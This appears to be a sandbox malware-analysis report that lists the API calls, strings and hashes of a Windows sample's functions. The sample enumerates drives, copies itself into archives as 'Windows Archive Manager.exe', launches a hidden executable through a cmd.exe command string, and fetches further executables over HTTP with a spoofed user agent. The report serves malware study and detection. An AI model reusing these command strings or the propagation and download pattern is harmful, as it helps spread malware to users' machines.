                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep$File$Find$CurrentDirectoryNamePathmemset$AttributesCharCloseCopyDeleteFirstFullLowerNext
                                                                                                                                                                                                                          • String ID: *.*$.7z$.exe$.rar$.tar$.zip$Recycle.Bin$Windows Archive Manager.exe$Windows Archive Manager.exe$Windows Archive Manager.exe
                                                                                                                                                                                                                          • API String ID: 3651916915-102573928
                                                                                                                                                                                                                          • Opcode ID: 8b1b2d7f8a039c62f6c4c4d9b4637672017d804c880b88671d2c665f31323fe8
                                                                                                                                                                                                                          • Instruction ID: 13ad03c69c0ac6c2c187dcc74027e427e02459b5877deabd40d7f6eaf18e51b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b1b2d7f8a039c62f6c4c4d9b4637672017d804c880b88671d2c665f31323fe8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D817F71904618AFEB209F60DD49B9E77B9EB44305F5001FAF109F61D0EF7A9A948F18
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00410CAC
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00410CBA
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00410CD3
                                                                                                                                                                                                                            • Part of subcall function 00423370: RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
                                                                                                                                                                                                                            • Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
                                                                                                                                                                                                                            • Part of subcall function 00423370: LoadCursorA.USER32(00000000,00007F00), ref: 00423402
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClassExA.USER32(00000030), ref: 00423425
                                                                                                                                                                                                                            • Part of subcall function 00423370: __recalloc.LIBCMT ref: 00423479
                                                                                                                                                                                                                            • Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(0044B30C,00000081,00000005), ref: 00410CEC
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(0044B30C,00000081,000000F0), ref: 00410D07
                                                                                                                                                                                                                          • LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D13
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410D1A
                                                                                                                                                                                                                          • LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D28
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410D37
                                                                                                                                                                                                                          • DialogBoxIndirectParamA.USER32(0044B30C,00000000,?,00411A10,00000000), ref: 00410D5C
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410D71
                                                                                                                                                                                                                          • GlobalHandle.KERNEL32(00000000), ref: 00410D7E
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00410D85
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00410DA3
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410DAB
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410DBA
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00410DD4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$ErrorLast$ClassCriticalLoadRegisterSection$ClipboardEnterFindFormatGlobalInfoLock$CurrentCursorDialogExceptionFreeHandleIndirectLeaveParamRaiseThread__recalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 825656904-0
                                                                                                                                                                                                                          • Opcode ID: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
                                                                                                                                                                                                                          • Instruction ID: f745feaec7197e157a37296f2868a76793427c604a9b77b08ca0e5f371f76add
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A631D835241700BBD7201BB5BC8CAAB3B58EB49721B141A76FD11C2391DBF8DCC1866D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402C56
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00408058,00000208), ref: 00402C6A
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00402C75
                                                                                                                                                                                                                          • _wfopen.MSVCRT ref: 00402C85
                                                                                                                                                                                                                          • fseek.MSVCRT ref: 00402CA5
                                                                                                                                                                                                                          • ftell.MSVCRT ref: 00402CB3
                                                                                                                                                                                                                          • fclose.MSVCRT ref: 00402CC4
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00402CCF
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402CE3
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402CF9
                                                                                                                                                                                                                          • GetLogicalDriveStringsW.KERNEL32(000000D0,?), ref: 00402D0D
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00402D2D
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00402D56
                                                                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,00000000,00000000,00000000), ref: 00402D75
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00402DAA
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00402DE8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DriveSleepmemset$Type$ErrorFileInformationLogicalModeModuleNameStringsVolume_wfopenfclosefseekftell
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2588250049-0
                                                                                                                                                                                                                          • Opcode ID: d191e9a8f75e0fbffc6d4aae871cf30d55971b18d680d993de1adc8e6532ab47
                                                                                                                                                                                                                          • Instruction ID: abd61d0839dc9ad5a3035ce58b77fb3bf3c2ac84987508875e7d16b0c097f562
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d191e9a8f75e0fbffc6d4aae871cf30d55971b18d680d993de1adc8e6532ab47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3418671980248BBEB10AB90EE4EF9E77B4AF04701F6000B6F504F51E1DAB85E94DB59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0042EDA1
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EDB6
                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00440498), ref: 0042EDC1
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0042EDDD
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 0042EDE4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                          • Opcode ID: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
                                                                                                                                                                                                                          • Instruction ID: 23f69739ab82ab60ae37d22de6363e677c78d496a800df86a2d8b411d35bdd9f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA21E0BC9042449FE711DF69FC496497BA0FB4A310F80107AE50997BA5E7B4A984CF8D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00402100
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004051CC,00000000,00000001,004051BC,?), ref: 0040212F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • /c start _ & _\DeviceManager.exe & exit, xrefs: 004021AA
                                                                                                                                                                                                                          • %windir%\system32\cmd.exe, xrefs: 00402142
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateInitializeInstance
                                                                                                                                                                                                                          • String ID: %windir%\system32\cmd.exe$/c start _ & _\DeviceManager.exe & exit
                                                                                                                                                                                                                          • API String ID: 3519745914-2217386832
                                                                                                                                                                                                                          • Opcode ID: 132f5f5c97dbb597229882e81c4ab9378bc9746ca38293107714f6a099fd9e5a
                                                                                                                                                                                                                          • Instruction ID: 57fe1dbd42bb2324eb575007eabe7048b87a754a97f5de83621bb56dba04deff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 132f5f5c97dbb597229882e81c4ab9378bc9746ca38293107714f6a099fd9e5a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C414C74A00209EFDB01DF98D989E9DBBB1FF49305F1081A5F921AB2A1C775AA50EF44
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Genu$ineI$ntel
                                                                                                                                                                                                                          • API String ID: 0-3389352399
                                                                                                                                                                                                                          • Opcode ID: 52cbd61522585250e19d3114367751f5325cb0de59fbfbbc320b6f6ec86cf59e
                                                                                                                                                                                                                          • Instruction ID: bfbf53ffdf3c68aa112622bc787a3d38529acc3aeedecc54d8b01405816e6063
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52cbd61522585250e19d3114367751f5325cb0de59fbfbbc320b6f6ec86cf59e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78417F71E043066BFF548A99C8853AFBAA1EB4C310F26D06ADA05E6386D67C8D40CB58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00422511,?,00423D9B,00422511,?,00422511,?), ref: 00423CC1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00423D9B,00422511,?,00422511,?), ref: 00423CC8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                          • Opcode ID: 836220c8a2a7f04cd6de906eb50738faec21f6589d8772b7677baa12a7aca838
                                                                                                                                                                                                                          • Instruction ID: 33085a4ccc8ec1950882e2bb6640ee68c40b8ea8a8b0bd8591927fa50b4ae241
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 836220c8a2a7f04cd6de906eb50738faec21f6589d8772b7677baa12a7aca838
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2D0C932544218ABDF101FEABD0CA9A3B6DF789B22F404461F51DD2560CB76E850EA98
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GenuineIntel
                                                                                                                                                                                                                          • API String ID: 0-2798635751
                                                                                                                                                                                                                          • Opcode ID: 1279d484bb9a458165338d8abd8b6d1b876928afe97c09f6af912ebc83d36ba1
                                                                                                                                                                                                                          • Instruction ID: d2096b51ca2794451b2d7f5899c45eecea93f550925a2222af7c97c906a12598
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1279d484bb9a458165338d8abd8b6d1b876928afe97c09f6af912ebc83d36ba1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79D159B5D052299FDB28CF4AD9812AEBBF1FB89310F24856ED949E3310D334A941CF58
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2430093141.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2510000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00408260,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401371
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00401395
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 004013B0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                          • String ID: !$0$=$@$R$a$r$s$t${$4@
                                                                                                                                                                                                                          • API String ID: 1378416451-1478285898
                                                                                                                                                                                                                          • Opcode ID: 1dbbe0be060ca4b6c279e6e33d22273a4b7798d521a9a355bc9f0e26829d7780
                                                                                                                                                                                                                          • Instruction ID: 3aa843619d31d418073711cef59783edf8e6a9b44ca045ba224e396693470445
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dbbe0be060ca4b6c279e6e33d22273a4b7798d521a9a355bc9f0e26829d7780
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02B12A31904268EEEF219B64DD09B9EBBB5BF04304F0441E6E24CBA1E1DB751E84DF69
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00414176
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00414184
                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 004141B7
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00414206
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00414214
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00414220
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00414263
                                                                                                                                                                                                                          • GetClassNameA.USER32(00000000,?,00000008), ref: 00414271
                                                                                                                                                                                                                          • lstrcmp.KERNEL32(?,0043ACB4), ref: 00414281
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0041428D
                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 00414297
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004143A9
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004143C4
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 004143D5
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004143E7
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0041444B
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0041445D
                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00414471
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004144B1
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004144BC
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
                                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 004145D1
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 004145E2
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 004146A8
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$Variant$Clear$AllocColorGlobal$CacheClassCurrentFlushInitInstructionNameParentProcessString_memcpy_slstrcmplstrlen
                                                                                                                                                                                                                          • String ID: 4D
                                                                                                                                                                                                                          • API String ID: 1879328196-4064760932
                                                                                                                                                                                                                          • Opcode ID: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
                                                                                                                                                                                                                          • Instruction ID: d33cbc65b261bd5f71919fcd58597f20de14d50e8eab0a0e342eb175f4602f49
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99028C71204205AFDB10CF24D848BABBBE5BF85714F14862AF859DB2A0D778DD81CB5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000001,00000000,00000000,00000000), ref: 0040168A
                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(?,vG@,00000000,00000000,00000000,00000000), ref: 004016AB
                                                                                                                                                                                                                          • PathFindFileNameA.SHLWAPI(?), ref: 004016C1
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 00401748
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 004017C2
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040183C
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 004018B6
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040193F
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00401948
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00401951
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00401CC7
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00401CD0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$HttpInfoQuery$CloseHandle$Open$FileFindNamePath
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0$m.exe$m.exe$o.exe$o.exe$p.exe$p.exe$s.exe$s.exe$t.exe$t.exe$vG@
                                                                                                                                                                                                                          • API String ID: 37956365-2170266109
                                                                                                                                                                                                                          • Opcode ID: d811898af9405caae475fb2c357d6a7e46e2496191ffd16bc4c9c98ebedf9716
                                                                                                                                                                                                                          • Instruction ID: fb553488e42a15cb40c77f0b723d3c996e8af59fc795cfdcf88d4fc03e82c5ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d811898af9405caae475fb2c357d6a7e46e2496191ffd16bc4c9c98ebedf9716
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3224974D042989FDF21CFA8C844BEDBBB1AB16314F1441EAD099B72A1D3785E89CF19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00420FE0
                                                                                                                                                                                                                          • GetClipBox.GDI32(00000000,?), ref: 00421001
                                                                                                                                                                                                                          • LPtoDP.GDI32(?,?,00000002), ref: 0042101C
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00421047
                                                                                                                                                                                                                          • DPtoLP.GDI32(?,?,00000002), ref: 00421058
                                                                                                                                                                                                                          • SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042106C
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000001,00000001), ref: 00421078
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0042108A
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004210AA
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004210BA
                                                                                                                                                                                                                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004210D9
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004210E8
                                                                                                                                                                                                                            • Part of subcall function 004212B0: GetClipBox.GDI32(?,?), ref: 004212DA
                                                                                                                                                                                                                            • Part of subcall function 004212B0: SetBkColor.GDI32(?,00000001), ref: 0042132A
                                                                                                                                                                                                                            • Part of subcall function 004212B0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
                                                                                                                                                                                                                            • Part of subcall function 004212B0: SetBkColor.GDI32(?,00000000), ref: 00421367
                                                                                                                                                                                                                            • Part of subcall function 004212B0: DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
                                                                                                                                                                                                                            • Part of subcall function 004212B0: OffsetRect.USER32(00000010,00000003,?), ref: 004213CD
                                                                                                                                                                                                                          • GetScrollPos.USER32(?,00000001), ref: 0042111F
                                                                                                                                                                                                                          • OffsetRect.USER32(?,00000000,00000000), ref: 00421132
                                                                                                                                                                                                                          • OffsetRect.USER32(?,00000000,?), ref: 004211D9
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004211F6
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000000), ref: 00421201
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0042124D
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0042125C
                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 0042127F
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0042128E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$ColorRectSelect$Offset$ClipDeleteModePaintText$BeginClientDrawEdgeScrollWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2062583074-0
                                                                                                                                                                                                                          • Opcode ID: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
                                                                                                                                                                                                                          • Instruction ID: 7b82af6886746e71b5745f1b2fbacf292f59da6906099b940e92044999803834
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
